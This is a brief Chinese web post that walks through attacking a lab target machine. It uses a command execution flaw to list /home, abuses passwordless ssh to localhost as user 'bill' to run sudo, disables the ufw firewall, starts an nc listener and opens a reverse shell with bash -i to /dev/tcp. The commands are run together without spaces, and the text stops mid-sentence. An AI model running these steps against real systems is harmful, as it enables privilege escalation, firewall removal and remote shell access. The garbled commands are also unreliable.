时间:2022-6-30来源:本站原创作者:佚名
命令执行漏洞

一般查看home目录,挖掘用户信息:ls-alh/home查看具体用户的目录:ls-alh/home/用户名/查看系统信息:uname-a

利用ssh命令执行root权限命令

使用ssh用户名

localhost通过ssh登录服务器是不需要身份验证的;

比如查看bill用户sudo命令的权限:sshbill

localhostsudo-l

ubuntu自带防火墙,所以关闭防火墙方便后面的操作。

sshbill

localhostsudoufwdisable

反弹shell

攻击机启动监听netcat

nc-nlvp

查看是否nc正在监听

netstat-pantu

靶场机器反弹shell

sshbill

locahostsudobash-i/dev/tcp/ip/01

然后监听端

渗透测试技巧

开启python简易
转载请注明原文网址:http://www.coolofsoul.com/hjpz/hjpz/24209.html

------分隔线----------------------------